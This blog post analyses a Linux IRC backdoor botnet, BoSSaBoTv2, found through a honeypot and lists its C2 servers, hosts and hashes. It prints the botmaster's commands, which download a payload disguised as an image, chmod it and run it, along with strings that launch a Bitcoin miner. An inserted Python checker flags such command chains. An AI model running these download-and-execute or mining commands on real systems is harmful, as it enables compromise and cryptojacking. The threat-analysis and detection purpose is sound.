BoSSaBoTv2 : another Linux Backdoor IRC (malekal's site)





malekal's site, News Malwares / Informatique / Internet [en]. Page printed 09/13/2014 06:07 PM.

Today I was looking at my web honeypot and this entry caught my attention: http://www.malekal.com/modsec/index.php?ip=178.32.59.202

The PHP vulnerability is heavily used (I already wrote about it: http://www.malekal.com/2014/03/31/backdoor-perl-shellbot-b-et-backdoor-linuxtsunami-a/ ), but it was the first time I saw this base64-decode code. The code leads to haxmeup.uni.me (192.95.12.34, OVH), which redirects to http://www.bilder-upload.eu/thumb/41130a-1408995611.jpg

I expected to get a PHP shellbot as usual, but this time it was a FUD (fully undetected) binary: https://www.virustotal.com/fr/file/bb07c119752e1c60046efffc8b75e40be2bf74e57e00d260e757cf8d859b99e9/anal/1409041374/

So I launched it:

It made a connection to 37.59.74.161 (OVH again) on port 8067; there is an IRCd behind it:

    nmap -sV 37.59.74.161 -p 8067
    Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-26 10:47 CEST
    Nmap scan report for 37.59.74.161
    Host is up (0.027s latency).
    PORT     STATE SERVICE VERSION
    8067/tcp open  irc     Unreal ircd
    Service Info: Host: irc.wix.wix
    Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .

So, an IRC backdoor. Another surprise: the IRCd doesn't have any mode set to hide users etc. About 40 bots, not so many. So let's play.

On the screenshot below, we can see that the botmaster launches an IP range scan, then some bots exploit some servers. We can see that the exploit against 200.185.236.85 was successful, because it joins the channel as a new bot.

This is confirmed by my VM. We also get another DNS name, con32.cz.cc, which resolves to the same IP, 192.95.12.34.

Two new bots:

The IRCd is new: around 40 bots in 9 days. The botmaster regularly makes the bots download a new binary, always from www.bilder-upload.eu (which seems to be a legitimate image host):

    !boss* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp
    !boss* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4l2njg5vab
    !boss* SH chmod 777 /tmp/4l2njg5vab
    !boss* SH /tmp/4l2njg5vab

Some hashes and hosts recap:

haxmeup.uni.me / con32.cz.cc / con64.cz.cc (192.95.12.34, OVH)
haxmedown.cz.cc
37.59.74.161
http://malwaredb.malekal.com/index.php?hash=35c950db3dc60b55e623ec591f8d7f33
http://malwaredb.malekal.com/index.php?hash=7f8cc390f7b3e53f2921f0debae09902
http://malwaredb.malekal.com/index.php?hash=dfb0291c04d6593103e6ac7a8954f19e

Then I wrote a little script to send the abuse emails; hopefully they will lose some bots.

MalwareMustDie decompiled the binary; some strings: http://pjjoint.malekal.com/files.php?read=20140826_n7h14d5w5i6 Thanks to them.

Bitcoin mining capabilities:

    000000007BC0 /tmp/minerd -t 4 -o stratum+tcp://%s:%s -O %s:%s -q -B 2>/dev/null &
    000000007C20 pkill minerd ; pkill m32 ; pkill m64
    000000007C60 wget -q tenet.dl.sourceforge.net/project/cpuminer/pooler-cpuminer-2.4-linux-x8
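As an added example (not the post's own code), a small Python checker that walks captured bot commands like the "!boss* SH ..." lines and the minerd launch template quoted above, and flags the dropper chain (image-named download into /tmp, rename, chmod 777, execution) together with any stratum mining pool the bots are told to connect to. The sample command list is constructed from the post's commands; the pool host and credentials in it are placeholders.

```python
import re

# Constructed sample modelled on the "!boss* SH ..." lines quoted in the post and
# on the binary's minerd command template; the pool host and credentials below
# are placeholders, not values from the post.
SAMPLE_COMMANDS = [
    "!boss* SH wget http://www.bilder-upload.eu/thumb/05fbc4-1409059856.jpg -P /tmp",
    "!boss* SH mv /tmp/05fbc4-1409059856.jpg /tmp/4l2njg5vab",
    "!boss* SH chmod 777 /tmp/4l2njg5vab",
    "!boss* SH /tmp/4l2njg5vab",
    "!boss* SH /tmp/minerd -t 4 -o stratum+tcp://pool.example:3333 -O user:pass -q -B 2>/dev/null &",
    "!boss* SH uptime",
]

C2_PREFIX = re.compile(r"^!\S+\s+SH\s+(.*)$")            # "!boss* SH <shell command>"
WGET_RE = re.compile(r"\bwget\s+(?:-\S+\s+)*(\S+)(?:.*?-P\s+(\S+))?")
MV_RE = re.compile(r"\bmv\s+(\S+)\s+(\S+)")
CHMOD_RE = re.compile(r"\bchmod\s+([0-7]{3,4})\s+(\S+)")
MINER_RE = re.compile(r"\bminerd\b.*?-o\s+(stratum\+tcp://\S+)")
IMAGE_EXT = re.compile(r"\.(?:jpe?g|png|gif)$", re.IGNORECASE)


def analyse(commands):
    """Return dropper chains (download -> rename -> chmod -> exec) and miner pools."""
    tracked = {}                                  # current path -> chain record
    findings = {"dropper_chains": [], "miner_pools": []}
    for line in commands:
        m = C2_PREFIX.match(line)
        if not m or not m.group(1).strip():
            continue                              # not a shell command to the bots
        cmd = m.group(1).strip()
        if w := WGET_RE.search(cmd):
            url, outdir = w.group(1), w.group(2) or "."
            path = outdir.rstrip("/") + "/" + url.rsplit("/", 1)[-1]
            rec = {"url": url, "path": path, "disguised": bool(IMAGE_EXT.search(url)),
                   "chmod": None, "executed": False}
            tracked[path] = rec
            findings["dropper_chains"].append(rec)
        elif (v := MV_RE.search(cmd)) and v.group(1) in tracked:
            rec = tracked.pop(v.group(1))         # follow the rename to the new path
            rec["path"] = v.group(2)
            tracked[v.group(2)] = rec
        elif (c := CHMOD_RE.search(cmd)) and c.group(2) in tracked:
            tracked[c.group(2)]["chmod"] = c.group(1)
        elif p := MINER_RE.search(cmd):
            findings["miner_pools"].append(p.group(1))
        elif cmd.split()[0] in tracked:           # the dropped file is launched
            tracked[cmd.split()[0]]["executed"] = True
    return findings
```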

The most interesting one:

    000000007E1D BoSSaBoTv2-%s

A Google search finds this thread on http://www.hackforums.net/showthread.php?tid=4395309 According to the post date, the kit is new, and the price is $100.


Back; lots of attacks this weekend:

http://www.malekal.com/modsec/index.php?ip=213.73.31.13
http://www.malekal.com/modsec/index.php?ip=195.154.140.251
http://www.malekal.com/modsec/index.php?ip=5.135.64.105
http://www.malekal.com/modsec/index.php?ip=46.105.230.91
http://www.malekal.com/modsec/index.php?ip=128.233.173.167

Binaries are undetected:

http://malwaredb.malekal.com/index.php?hash=5453043042be4ad21259bcb9b17e9bd3
http://malwaredb.malekal.com/index.php?hash=36263d91d726dcdb93b97ea05ae8656a

IRCd: 23.95.10.101, port 53


2 Comments

sneezing_panda, posted 8 September 2014 at 4:28
He's an idiot. http://puu.sh/bqoya/ebec4b2878.png People are already complaining on the HF thread.

CyD, posted 8 September 2014 at 10:52
Using botnets of zombie computers to spread malicious code through vulnerabilities in order to perform cyber-based attacks like denial-of-service is a big mistake. Please report this kind of cybercrime activity to federal law enforcement. Keep up the good work.
